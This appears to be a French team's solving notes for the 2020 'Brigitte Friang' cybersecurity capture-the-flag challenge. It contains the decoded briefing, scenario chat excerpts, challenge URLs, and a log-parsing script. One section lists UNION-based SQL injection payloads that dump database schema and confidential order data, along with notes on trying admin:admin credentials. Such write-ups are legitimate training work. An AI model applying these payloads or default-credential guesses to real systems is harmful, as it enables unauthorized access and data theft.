--- tags: brigitte --- # message décodé --- Si vous parvenez a lire ce message, c'est que vous pouvez rejoindre l’operation «Brigitte Friang». Rejoignez-nous rapidement. Brigitte Friang est une resistante, journaliste et ecrivaine francaise. Elle est nee le 23/01/1924 a Paris, elle a 19 ans sous l'occupation lorsqu'elle est recrutee puis formee comme secretaire/chiffreuse par un agent du BCRA, Jean-Francois Clouet des Perruches alias Galilee chef du Bureau des operations aeriennes (BOA) de la Region M (Cote du Nord, Finistere, Indre et Loire, Orne, Sarthe, Loire inferieure, Maine et Loire, Morbihan, Vendee). Brigitte Friang utilise parfois des foulards pour cacher des codes. Completez l’URL avec l’information qui est cachee dans ce message. Suite a l’arrestation et la trahison de Pierre Manuel, Brigitte Friang est arretee par la Gestapo. Elle est blessee par balle en tentant de s’enfuir et est conduite a l’Hopital de la Pitie. Des resistants tenteront de la liberer mais sans succes. Elle est torturee et ne donnera pas d'informations. N’oubliez pas la barre oblique. Elle est ensuite envoyee dans le camp de Ravensbruck. Apres son retour de deportation, elle participe a la creation du Rassemblement du peuple français (RPF). Elle integre la petite equipe, autour d'Andre Malraux, qui va preparer le discours fondateur de Strasbourg en 1947 et les elections legislatives de 1951. Elle rentre a l'ORTF, et devient correspondante de guerre. Elle obtient son brevet de saut en parachute et accompagne des commandos de parachutistes en operation durant la guerre d’Indochine. Elle raconte son experience dans Les Fleurs du ciel (1955). D'autres agents sont sur le coup au moment ou je vous parle. Les meilleurs d'entre vous se donneront rendez-vous a l'European Cyberweek a Rennes pour une remise de prix. Resolvez le plus d'epreuves avant la fin de cette mission et tentez de gagner votre place parmi l'elite! Par la suite, elle couvre l’expedition de Suez, la guerre des Six Jours et la guerre du Viet Nam. Elle prend position en faveur d'une autonomie du journalisme dans le service public ce qui lui vaut d'etre licenciee de l'ORTF. Elle ecrit plusieurs livres et temoigne de l'engagement des femmes dans la Resistance. --- **URL :** "chat" --- Antoine Rossignol 29/09/2020 : "Un des nos agents a intercepté du matériel de chiffrement et un message chiffré émis par Evil Chems qui doit contenir des informations capitales sur la livraison de produits chimiques." Agent 40 30/09/2020 : "OK, on s'occupe de démonter le matériel pour analyse." Agent 40 08/10/2020 : "C'est plus compliqué que prévu! Le processeur ne fait qu'échanger des données avec un circuit intégré dédié (ASIC). On suppose qu'il contient l'algorithme de chiffrement et que la clé y est stockée en dur." Antoine Rossignol 08/10/2020 : " Envoyez en urgence l'ASIC à Eve Descartes d'ESIEE-Paris pour une rétro-conception matérielle" Agent 40 12/10/2020 : "Eve Descartes a bien reçu le circuit. Elle s'en occupe en priorité." Antoine Rossignol 23/10/2020 : "Voici le compte-rendu d'Eve avec la cartographie de la zone étudiée. Il devient urgent de déchiffrer le message." --- **Antoine Rossignol** https://www.challengecybersec.fr/chat/public/uploads/layout.pdf https://www.challengecybersec.fr/chat/public/uploads/compte_rendu_eve.pdf --- **Jeremy Nitel** **Fuite de mdp url :** /4e9033c6eacf38dc2a5df7a14526bec1 Inject SQL : - ' UNION SELECT table_name FROM information_schema.tables - ' UNION SELECT * FROM customer - ' UNION SELECT group_concat(COLUMN_NAME), 1, 1, 1, 1 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'orders' # => get columns names of a table - GEt all data of a table : ' UNION SELECT confidential, customer, delivery_date, id, item_name FROM orders # **orders** = confidential, customer, delivery_date, id, item_name, order_date, order_status, section, supplier **customer** = delivery_address, email, id, name, signup_date **section** = capacity, confidential, id, last_update, name **supplier** = address, id, name, website **Site billet avion url :** /35e334a1ef338faf064da9eb5f861d3c Prendre ABDJI6 du 26/10/2020 au 28/10/2020 **Valeur du QRCode**de la forme : DGSESIEE{un_hash} - mdp pour sokos admin:admin - se creer un compte pour reserver le billet ne fonctionne pas - il faut surement se connecter a un compte existant - sokos injection sql surement possible **Blaise Pascal** https://www.challengecybersec.fr/chat/public/uploads/original.txt https://www.challengecybersec.fr/chat/public/uploads/intercepte.txt --- **Alphonse Bertillon** https://www.challengecybersec.fr/chat/public/uploads/access.log IP de challengecybersec.fr : 51.159.59.20 Comment trouver l'IP: Faire un script qui fait une liste de toutes les IPs puis regarder une IP non habituelle avec une occurrence bizarre du style "1" ``` #Python script: #!/usr/python3 lines = None with open("access.log", "r") as f: lines = f.read().split('\n') if lines == None: exit -1 for i in range(len(lines)): lines[i] = lines[i].split(' ')[0] ips = [[x,lines.count(x)] for x in set(lines)] for ip in ips: print(ip) ``` Log Nginx => retrouver IP : **179.97.58.61** **Image recue apres IP :** https://www.challengecybersec.fr/chat/public/uploads/evil_country_landscape.jpg